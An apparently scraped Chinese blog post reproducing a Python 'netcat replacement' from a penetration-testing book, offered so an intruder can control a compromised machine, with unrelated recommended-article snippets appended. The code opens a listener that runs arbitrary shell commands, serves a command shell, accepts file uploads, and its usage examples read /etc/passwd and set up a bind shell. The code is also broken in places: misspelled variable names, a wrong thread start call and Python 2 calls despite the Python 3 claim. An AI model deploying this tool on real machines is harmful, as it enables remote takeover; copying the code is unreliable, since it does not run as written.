取代netcat
前言
众所周知,netcat是网络界的瑞士军刀,它的主要作用是:提供连接其他终端的方法,可以上传文件,反弹shell等等各种利于别人控制你电脑的操作。所以聪明的系统管理员会将它从系统中移除,这样当别人渗透进入你的系统,也没有现成的连接工具给他们用。
代码实现
import sys
import socket
import getopt
import threading
import subprocess
#定义一些全局变量
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
def usage():
print("BHP Net Tool")
print()
print("Usage: bhpnet.py -t target_host -p port")
print("-l --listen - listen on [host]:[port] for incoming cennections")
print("-e --execute=file_to_run - execute the given file upon receiving a connection ")
print("-c --command - initialize a command shell")
print("-u --upload=destination - upon receiving connection upload a file and write to [destinction]")
print()
print()
print("Examples: ")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -c")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -u=C:\\target.exe")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"")
print("echo 'ABCDEFGHIJK' | ./bhpnet.py -t 192.168.0.1 -p 8888")
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destincation
global target
if not len(sys.argv[1:]):
usage()
try:
opts,args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen"
,"execute","tarhet", "port", "command", "upload"])
except getopt.GetoptError as err:
print(str(err))
usage()
for o,a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destinction = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False,"Unhandle Option"
#判断我们是在监听还是仅仅从标准输入发送数据
#listen为False,len(target)大于0,port > 0 三个条件同时成立,则证明:
#是从标准输入读取数据,即:从标准输入读取数据,发送到监听端(服务端)。
#这里的标准输入可以来自键盘输入,亦可以来自文件重定向。
if not listen and len(target) and port > 0:
#从命令行(标准输入)读取数据
#这里将阻塞,所以在不想向标准输入发送数据时:要发送CTRL-D
buffer = sys.stdin.read()
# 将标准输入的数据发送到监听端
client_sender(buffer)
#如果上面的if语句没被执行,那么就说明这个程序是作为监听端了。
#我们开始监听并准备上传文件,执行命令
#放置一个反弹shell
#具体操作取决于你用的命令行选项
if listen:
server_loop()
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
#连接到目标主机
client.connect((target, port))
if len(buffer):
client.send(buffer)
while(True):
#现在等待数据回传
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data
if recv_len < 4096:
break
print(response,)
#等待更多输入
buffer = raw_input("")
buffer += "\n"
#发送出去
client.send(buffer)
except:
print("[*] Exception! Exiting")
client.close()
def server_loop():
global target
#如果没有定义目标,则监控所有端口
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while(True):
client_socket, addr = server.accept()
#分拆一个线程处理新的客户端
client_thread = threading.Thread(target=client_handler, args = (client_socket,))
client.start()
def run_command(command):
command = command.rstrip()
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = "Falied to execute command.\r\n"
return output
def client_handler(client_socket):
global upload
global execute
global command
if len(upload_destination):
#读取所有的字符并写入目标
# (目标是一个文件,文件名跟在-u后面,这个操作就是将客户端传过来的数据写进文件里)
file_buffer = ""
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
#现在将接受到的数据file_buffer写进文件里
try:
file_descriptor = open(upload_destinction, "wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
#向另一端(即客户端)发送确认报文,确认文件已成功接收
client_socket.send("Successful saved file to %s\r\n" % upload_destinction)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destinction)
#检查命令执行
if len(execute):
output = run_command(execute)
client_socket.send(output)
#如果需要一个命令行shell,那么我们进入另一个循环
if command:
while True:
#跳出一个窗口
client_socket.send("<BHP: #> ")
#现在我们接受文件直至发现换行符(即当你输入完命令后会按回车)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
#执行命令,并且将命令的输出结果保存在response里
response = run_command(cmd_buffer)
# 返回相应数据
client_socket.send(response)
if __name__ == "__main__":
main()
注意,我这个代码是python3的,如果想看python2的,看这位大神的博客
输出
将bhpnet.py作为客户端,连接百度:echo -ne "GET / HTTP/1.1\r\nHost:www.baidu.com\r\n\r\n" | ./bhpnet.py -t www.baidu.com -p 80
反弹一个shell(这里有-l参数的命令行是作为监听端,即服务端。没-l参数的作为客户端)。监听端命令:./bhpnet.py -p 5555 -c -l 客户端命令:./bhpnet.py -t 127.0.0.1 -p 5555
上传文件
小总结
或许经历了前面TCP服务端与TCP客户端分离的形式,你会分不清什么时候bhpnet.py作为服务端,什么时候作为客户端。这里可以简单认为:有-l参数的就是服务端。因为只有服务端会监听端口。
取代netcat的更多相关文章
- python渗透测试入门——取代netcat
1.代码及代码讲解. 实验环境:windows10下的linux子系统+kali虚拟机 import argparse import socket import shlex import subpro ...
- socket | netcat 模拟
#!/opt/local/bin/python2.7 #coding=utf-8 ''' 取代netcat 两台主机中其中一台控制另一台 得到北控方的shell ''' import sys impo ...
- python黑帽子
1.TCP客户端 #AF_INET 使用标准的IPv4地址或者主机名 #SOCK_STREAM是一个客户端 import socket target_host = 'www.google.com' t ...
- 《Python黑帽子:黑客与渗透测试编程之道》 网络基础
TCP客户端: 示例中socket对象有两个参数,AF_INET参数表明使用IPv4地址或主机名 SOCK_STREAM参数表示是一个TCP客户端.访问的URL是百度. #coding=utf-8 i ...
- 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道
python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...
- [转]NetCat简介
NetCat是一个非常简单的Unix工具,可以读.写TCP或UDP网络连接(network connection).它被设计成一个可靠的后端(back-end) 工具,能被其它的程序或脚本直接地或容易 ...
- 取代SharedPreferences的多进程解决方案
Android的SharedPreferences用来存储一些键值对, 但是却不支持跨进程使用. 跨进程来用的话, 当然是放在数据库更可靠啦, 本文主要是给作者的新库PreferencesProvid ...
- 让代码重构渐行渐远系列(3)——string.Equals取代直接比较与非比较
重构背景及原因 最近由于项目组的人员在不断扩充,导致项目中代码风格各异,大有百花齐放甚至怒放之势.考虑到团队的生存与发展,经过众人多次舌战之后,最终决定项目组根据业务分成几个小分队,以加强团队管理与提 ...
- 第1章 重构,第一个案例(3):运用多态取代switch
3. 运用多态取代与价格相关的条件逻辑 3.1 switch和“常客积分”代码的再次搬迁 (1)switch:最好不要在另一个对象的属性上运用switch语句 switch(getMovie().ge ...
随机推荐
- 《Java Performance》笔记1——性能分析基础 2
4.内存使用率: 内存使用率的相关属性包括页面调度或页面交换.加锁.线程迁移中的让步式和抢占式上下文切换. 当应用运行所需的内存超过可用物理内存时,就会发生内存页面交换,系统在进行页面交换或使用虚拟内 ...
- Gson解析复杂的Bean类实现Parcelable
import java.util.ArrayList; import android.os.Parcel; import android.os.Parcelable; import android.s ...
- 实现QQ、微信、新浪微博和百度第三方登录(Android Studio)
前言: 对于大多数的APP都有第三方登录这个功能,自己也做过几次,最近又有一个新项目用到了第三方登录,所以特意总结了一下关于第三方登录的实现,并拿出来与大家一同分享: 各大开放平台注册账户获取AppK ...
- /etc/postfix下 main.cf 配置文件详解
postconf -n #别名数据库(postalias/newaliases 命令生成) alias_database = hash:/etc/postfix/aliases #别名表,列出 ...
- JS滚动加载
var one = true;//设置一个全局变量 $(window).scroll(function () { var hight = document.body.scrollHeight - do ...
- (转)Python 遍历List三种方式
转自: http://www.cnblogs.com/pizitai/archive/2017/02/14/6398276.html # 方法1 print '遍历列表方法1:' for i in l ...
- 网站启用gzip压缩
gzip压缩启用不启用还是要看实际情况的,启用gzip后可以相应的减轻带宽压力但是同时也会增加cpu的压力(压缩解压),相反的如果不启用那么cpu压力也会相应的减少,具体情况具体分析. Linux开启 ...
- js 解析本地Excel文件!
通常,一般读取Excel都是由后台来处理,不过如果需求要前台来处理,也是可以的.. 1.需要用到js-xlsx,下载地址:js-xlsx 2.demo: <!DOCTYPE html>&l ...
- Java Comparator的范型类型推导问题
问题 在项目中,有一处地方需要对日期区间进行排序 我需要以日期区间的开始日为第一优先级,结束日为第二优先级进行排序 代码 我当时写的代码如下: List<Pair<LocalDate, L ...
- [进程通信] Linux进程间通信(IPC)
简介 linux下进程间通信的几种主要手段: 1. 管道(Pipe)及有名管道(named pipe):管道可用于具有亲缘关系进程间的通信,有名管道克服了管道没有名字的限制,因此,除具有管道 ...